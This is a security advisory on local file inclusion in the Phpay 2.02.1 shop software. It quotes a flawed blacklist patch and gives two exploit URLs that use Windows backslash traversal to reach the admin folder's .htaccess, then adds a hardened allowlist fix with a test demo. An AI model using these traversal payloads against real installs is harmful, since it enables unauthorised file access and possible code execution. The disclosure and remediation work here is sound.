By Michael Brooks

Vulnerability Type: Local File Inclusion
Software: Phpay
Homepage: http://sourceforge.net/projects/phpay/
Version Affected: 2.02.1

Phpay has been affected by multiple local file include flaws; as a result, this patch was written:

    $config = ereg_replace(":","", $config);
    $config = trim(ereg_replace("../","", $config));
    $config = trim(ereg_replace("/","", $config));
    if (($config=="") || (!eregi(".inc.php",$config))) {
        $config="config.inc.php";
        echo "\n";
    }
    if (!file_exists("$config")) {
        echo "panic: $config doesn't exist!! Did you backup it after installation? ...";
        exit;
    }
    require("./$config");

To bypass this patch, backslashes can be used instead of forward slashes on Windows systems. Also, .inc.php must exist *somewhere* in the string.

Local File Include for Windows only:

    http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess

or if magic_quotes_gpc is turned on:

    http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess

Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration: there is a call to extract($_GET), so the exploit will work regardless of register_globals.

Using Linux is a very good fix for this issue.

Merry Christmas
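
A hardened counterpart to the blacklist patch quoted above, as an added example that is not Phpay's code or the advisory author's: it replaces character stripping with an anchored allowlist plus a canonical-path containment check, so the backslash form and the "`.inc.php` anywhere in the string" form both fall back to the default. The function name `resolve_config()`, the demo directory and the file `shop2.inc.php` are assumptions made for illustration; PHP 7.1 or later is assumed.

```php
<?php
// Added example (not Phpay code). resolve_config() and the demo directory
// are hypothetical; requires PHP 7.1+.
const DEFAULT_CONFIG = 'config.inc.php';

function resolve_config(?string $requested, string $configDir): string
{
    $default = $configDir . DIRECTORY_SEPARATOR . DEFAULT_CONFIG;

    // Allowlist, anchored at both ends: the whole value must be a bare file
    // name ending in ".inc.php". The original check only required the
    // pattern ".inc.php" to match somewhere, with "." unescaped.
    if ($requested === null
        || preg_match('/\A[A-Za-z0-9_-]+\.inc\.php\z/', $requested) !== 1) {
        return $default;
    }

    // Canonicalise, then require the resolved file to sit directly inside
    // the config directory. realpath() returns false for missing files and
    // resolves symlinks, so neither can escape the directory.
    $base = realpath($configDir);
    $path = realpath($configDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || dirname($path) !== $base) {
        return $default;
    }
    return $path;
}

// Constructed demo: a throwaway config directory with two valid files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phpay_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/config.inc.php', "<?php\n");
file_put_contents($dir . '/shop2.inc.php', "<?php\n");

$samples = [
    'shop2.inc.php',                          // legitimate alternate config
    'eregi.inc.php\\..\\admin\\.htaccess',    // backslash form from the advisory
    '../admin/.htaccess',                     // forward-slash traversal
    'missing.inc.php',                        // well-formed but nonexistent
    null,                                     // parameter absent
];
foreach ($samples as $s) {
    printf("%-40s => %s\n", var_export($s, true), basename(resolve_config($s, $dir)));
}
array_map('unlink', glob($dir . '/*.inc.php'));
rmdir($dir);
```

Only the first sample resolves to `shop2.inc.php`; every other input resolves to `config.inc.php`. The value should be read from `$_GET['config']` explicitly rather than through `extract($_GET)`.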